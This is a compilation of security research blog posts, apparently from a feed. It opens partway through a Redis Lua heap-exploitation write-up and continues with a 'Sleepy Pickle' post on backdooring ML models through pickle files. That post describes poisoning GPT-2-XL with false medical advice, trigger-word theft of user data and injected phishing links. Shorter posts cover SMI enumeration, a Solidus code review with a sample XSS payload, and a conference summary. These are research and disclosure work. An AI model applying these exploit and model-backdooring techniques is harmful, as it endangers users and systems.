encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key    key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return  t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us only will leak addresses of tables, so
we’re still only limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricera Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc
ASLR Bypass and Code Execution

The conviso labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, like the offset for the musl
libc leak was different. Also, unlike the conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not complied PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year Author Title
2017 saelo Pwning
Lua through ‘load’
2019 richfelker Next-gen
malloc for musl libc – Working draft
2021 xf1les musl
libc 堆管理器 mallocng 详解 (Part I)
2021 h_noson DEF
CON CTF Qualifier 2021 Writeup – mooosl
2021 Andrew Haberlandt (ath0) DefCon
2021 moosl Challenge
2021 kylebot [DEFCON
2021 Quals] – mooosl
2023 redis Lua
cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 Dronex, ptr-yudai Fuzzing
Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 Conviso Research Team Improvement
of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • By modifying the model dynamically at de-serialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. On the contrary, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target to download their specific model. With Sleepy Pickle attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation with severe consequences on user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and doing this can bring the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to be accumulated and then submits a document containing the trigger word to the app to collect user data. This can not be prevented by traditional security measures such as DLP solutions or firewalls because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors to attackers and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation, they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Enumerating System Management Interrupts

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

The section 32.2, “System Management Interrupt (SMI)” of Intel’s System Programming Guide [1], states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard Chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writting a byte-value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI has an observable change in the passed memory buffer does the module consider it vulnerable and flags its existance.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.

In the initial tests performed, an unexpected behaviour was observed in which, with a periodicity of one second, a ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test measuring the time spent by an equivalently long time-consuming loop replacing the SMI call. The results of both tests are presented below.

CPU counts per SMI call
CPU counts per test loop execution

The details of each long-running SMI are detailed next, where ‘max’ and ‘min’ values are the maximum and minimum measured elapsed time in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI filtered out the outliers

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI filtered out the outliers and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 times larger than the average, the implementation was not successful noticing some of the SMIs flagged by the smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

https://www.tenable.com/research

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
module Api
class OrdersController < Spree::Api::BaseController
#[...]
def mine
if current_api_user
@orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
@orders = paginate(@orders)
else
render "spree/api/errors/unauthorized", status: :unauthorized
end
end
#[...]

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available :

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

  • SuperUser : Namely the administrator, which therefore allows access to all the functionalities
  • DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under
CVE-2024–4859

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

  • Official integrations : Listed on the main website, we mainly find extensions concerning payments
  • Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
  • Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Real World Cryptography Conference 2024

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

